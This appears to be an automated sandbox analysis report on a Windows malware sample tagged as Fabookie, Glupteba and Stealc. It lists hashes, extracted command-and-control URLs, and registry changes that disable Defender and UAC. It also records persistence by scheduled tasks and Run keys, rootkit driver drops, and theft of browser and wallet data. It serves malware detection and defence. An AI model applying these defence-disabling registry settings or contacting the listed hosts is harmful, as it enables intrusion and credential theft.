fabookie | 8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5

Analysis

max time kernel
149s
max time network
145s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26-01-2024 19:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

23KB
MD5

13e50553cf74404e0667de093b05d4bb
SHA1

d2b4e780b13305b25cba7cd3b2259d94d84120a8
SHA256

8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5
SHA512

23f9cbf9e32dbe4f5238e10d9b41d47adb80815122d69c2717e35b1a166c0b45a4767bba52c8c793a2d73f8abe4d9abd0ac57e62b1490d4ef86b3ec639d2a18c
SSDEEP

384:2uBq0csxekW8SepChIaSpZAuIrl/6Hx4QZb7DFN24uNDZOEv+45GoGCJEF8ZpHbY:cS8oHhxNhuLOyrEFiR1tM

Score

10^/10

fabookie glupteba stealc discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Malware Config

Extracted

Family

stealc

http://185.172.128.79

Attributes

url_path
/3886d2276f6914c4.php

rc4.plain

Extracted

Family

fabookie

http://app.alie3ksgaa.com/check/safe

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/3004-509-0x0000000003660000-0x000000000378E000-memory.dmp	family_fabookie
behavioral1/memory/3004-550-0x0000000003660000-0x000000000378E000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 13 IoCs

resource	yara_rule
behavioral1/memory/1168-173-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1168-174-0x0000000004CE0000-0x00000000055CB000-memory.dmp	family_glupteba
behavioral1/memory/928-206-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1168-326-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1576-372-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/928-230-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1596-490-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2632-494-0x0000000000C00000-0x00000000012D2000-memory.dmp	family_glupteba
behavioral1/memory/1596-560-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1596-567-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1596-589-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1596-593-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1596-612-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Windows security bypass 2 TTPs 49 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0"	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0"	schtasks.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\gHQRn2JTYFpWYGG8K9d0kIVI.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
2352	bcdedit.exe
2920	bcdedit.exe
3012	bcdedit.exe
3052	bcdedit.exe
2756	bcdedit.exe
2832	bcdedit.exe
356	bcdedit.exe
820	bcdedit.exe
2736	bcdedit.exe
1424	bcdedit.exe
2080	bcdedit.exe
2824	bcdedit.exe
2492	bcdedit.exe
1464	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
83	2388	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2308	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\International\Geo\Nation	jhxefMU.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HvD7vLIqLxqGYrcIQxoJ2LOD.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iGFJhppef2WTpWaMDeIBitQh.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FQrls1XSsIZSh90ROJmSvM2U.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoHvtBuXvIO9X57T0x9CAeXE.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnbSn4MoLyVoTSE5Pma2DCMV.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sDBRH1ZEcJlKqJEs4RaSEQl0.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x0mZEAbgHbGUSajg67SRThht.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KiqjYZ7a1An1rIkaYHWKkKzd.bat	CasPol.exe

Executes dropped EXE 21 IoCs

pid	Process
2212	fQ4my349IPbqB9OhEtnjXBuB.exe
2020	BroomSetup.exe
1168	conhost.exe
928	gHQRn2JTYFpWYGG8K9d0kIVI.exe
2720	conhost.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
1884	Un1eO4zjvXKr6dJVls0c1pcD.exe
3000	jAJMcbS3MO21Yy4W1v5V5ehA.exe
2328	Install.exe
3004	iLydDdjWvTZucBdjqpLlYCDX.exe
1596	csrss.exe
2508	oMCJnrnDdRV6m7XbtMyl0qqJ.exe
2632	Install.exe
1576	Process not Found
784	patch.exe
1748	injector.exe
1680	conhost.exe
1072	windefender.exe
2216	windefender.exe
1544	schtasks.exe
572	jhxefMU.exe

Loads dropped DLL 47 IoCs

pid	Process
1036	CasPol.exe
2212	fQ4my349IPbqB9OhEtnjXBuB.exe
2212	fQ4my349IPbqB9OhEtnjXBuB.exe
1036	CasPol.exe
1036	CasPol.exe
1036	CasPol.exe
1036	CasPol.exe
2212	fQ4my349IPbqB9OhEtnjXBuB.exe
2212	fQ4my349IPbqB9OhEtnjXBuB.exe
2212	fQ4my349IPbqB9OhEtnjXBuB.exe
1036	CasPol.exe
1884	Un1eO4zjvXKr6dJVls0c1pcD.exe
1884	Un1eO4zjvXKr6dJVls0c1pcD.exe
1884	Un1eO4zjvXKr6dJVls0c1pcD.exe
1036	CasPol.exe
3000	jAJMcbS3MO21Yy4W1v5V5ehA.exe
1884	Un1eO4zjvXKr6dJVls0c1pcD.exe
2328	Install.exe
2328	Install.exe
2328	Install.exe
1036	CasPol.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
1036	CasPol.exe
1036	CasPol.exe
2328	Install.exe
2632	Install.exe
2632	Install.exe
2632	Install.exe
864	Process not Found
784	patch.exe
784	patch.exe
784	patch.exe
784	patch.exe
784	patch.exe
1596	csrss.exe
2720	conhost.exe
2720	conhost.exe
3000	jAJMcbS3MO21Yy4W1v5V5ehA.exe
784	patch.exe
784	patch.exe
784	patch.exe
1596	csrss.exe
2388	rundll32.exe
2388	rundll32.exe
2388	rundll32.exe
2388	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00050000000195f4-251.dat	upx
behavioral1/files/0x00050000000195f4-252.dat	upx
behavioral1/files/0x00050000000195f4-248.dat	upx
behavioral1/memory/3000-255-0x0000000001290000-0x0000000001778000-memory.dmp	upx
behavioral1/memory/3000-473-0x0000000001290000-0x0000000001778000-memory.dmp	upx
behavioral1/memory/3000-526-0x0000000001290000-0x0000000001778000-memory.dmp	upx
behavioral1/memory/1072-565-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2216-588-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2216-611-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\gHQRn2JTYFpWYGG8K9d0kIVI.exe = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0"	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	gHQRn2JTYFpWYGG8K9d0kIVI.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	jhxefMU.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	jhxefMU.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
11	pastebin.com
12	pastebin.com

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	schtasks.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	jhxefMU.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	jhxefMU.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	conhost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_91A876CD48120717E0EA4ECAEF92BD40	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	schtasks.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	schtasks.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_39B83AB13ED8E512BB8030E3672AA4B8	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_39B83AB13ED8E512BB8030E3672AA4B8	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_E8C9186ED5BC2F64FC58A60C8F09BA16	jhxefMU.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_E8C9186ED5BC2F64FC58A60C8F09BA16	jhxefMU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_91A876CD48120717E0EA4ECAEF92BD40	jhxefMU.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2264 set thread context of 1036	2264	Process not Found	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	gHQRn2JTYFpWYGG8K9d0kIVI.exe
File opened (read-only)	\??\VBoxMiniRdrDN	Process not Found

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\DufnooWHNFUn\TiYwRwl.dll	jhxefMU.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	jhxefMU.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	jhxefMU.exe
File created	C:\Program Files (x86)\WNdNVmbTRKpEC\JNOdhmq.xml	jhxefMU.exe
File created	C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\NhdhdFt.dll	jhxefMU.exe
File created	C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\NmHzpzx.xml	jhxefMU.exe
File created	C:\Program Files (x86)\WNdNVmbTRKpEC\JbEwdQv.dll	jhxefMU.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	jhxefMU.exe
File created	C:\Program Files (x86)\IAvstfEYU\GmHcrYO.xml	jhxefMU.exe
File created	C:\Program Files (x86)\gNEkwGGiCnIU2\QsdoUQI.xml	jhxefMU.exe
File created	C:\Program Files (x86)\IAvstfEYU\AuFrTe.dll	jhxefMU.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	jhxefMU.exe
File created	C:\Program Files (x86)\gNEkwGGiCnIU2\QAMunFdraTZeH.dll	jhxefMU.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\rss\csrss.exe	gHQRn2JTYFpWYGG8K9d0kIVI.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\gcsaRhxvmhmmEZS.job	schtasks.exe
File opened for modification	C:\Windows\rss	gHQRn2JTYFpWYGG8K9d0kIVI.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240126190559.cab	conhost.exe
File created	C:\Windows\Tasks\bmfUAJAHieefCXsdaD.job	conhost.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\HddpujWaDpLIbkLdt.job	schtasks.exe
File created	C:\Windows\Tasks\drPQSDndGmRZEFerX.job	schtasks.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3056	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	conhost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	conhost.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2840	schtasks.exe
1480	schtasks.exe
320	schtasks.exe
2168	schtasks.exe
2920	schtasks.exe
1436	schtasks.exe
2600	schtasks.exe
1372	schtasks.exe
2440	schtasks.exe
1436	schtasks.exe
2480	schtasks.exe
1056	schtasks.exe
288	schtasks.exe
768	schtasks.exe
1548	schtasks.exe
1544	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
768	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
